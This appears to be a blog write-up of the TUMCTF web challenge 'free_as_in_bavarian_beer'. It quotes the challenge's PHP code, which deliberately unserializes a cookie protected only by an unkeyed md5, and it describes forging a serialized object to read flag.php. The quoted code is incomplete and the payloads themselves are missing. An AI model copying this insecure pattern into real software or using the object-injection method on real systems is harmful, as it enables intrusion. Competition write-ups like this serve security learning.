web / free_as_in_bavarian_beer ( TUMCTF )

The 2-day pentest #dientaphcm.vn finished with no highlight. I feel very tired with my brain, so in this TUMCTF, I only try with one challenge in Web Category.


The basic post and basic XSS.


but sense imposible to exploit from this bug ^.^ because “hint: flag is in flag.php” and certainly we need to read source code from flag.php.

Something available in this web

<? // something spam in license.txt ?>


Class GPLSourceBloater{
public function __toString()
return highlight_file(‘license.txt’, true).highlight_file($this->source, true);

$s = new GPLSourceBloater();
$s->source = __FILE__;

echo $s;

$todos = [];

$c = $_COOKIE[‘todos’];
$h = substr($c, 0, 32);
$m = substr($c, 32);

if(md5($m) === $h){
$todos = unserialize($m);

$todo = $_POST[‘text’];

$todos[] = $todo;
$m = serialize($todos);
$h = md5($m);

setcookie(‘todos’, $h.$m);

header(‘Location: ‘.$_SERVER[‘REQUEST_URI’]);

* {font-family: “Comic Sans MS”, cursive, sans-serif}

<h1>My open/libre/free/PHP/Linux/systemd/GNU TODO List</h1>
<a href=”?source”><h2>It’s super secure, see for yourself</h2></a>
<?php foreach($todos as $todo):?>
<?php endforeach;?>

<form method=”post” href=”.”>
<textarea name=”text”></textarea>
<input type=”submit” value=”store”>

I try to read source in spite of tired

Something happen in my brain:

what  does  “<? //something spam in license.txt ?>” use to ? Do this help us read source 😀

so “class GPLSourceBloater ” does !!!

I try with google and found http://php.net/manual/en/language.oop5.magic.php

Magic Methods will auto call if object exist.

The Idea in this case is construct a GPLSourceBloater object.

And Object injection help we do this

after a post I get cookie like setcookie(‘todos’, $md5($m).$m); #m is serialize category.

To understand below payload you must check your mind in serialize function


To construct a GPLSourceBloater Object, I design cookie like serialize an object

and must have ‘this->source=”flag.php”‘ element.


but it’s print


yup, it must be an array of object to print this source.


And I get flag


Done!! Good night reader!!

Trả lời

Điền thông tin vào ô dưới đây hoặc nhấn vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s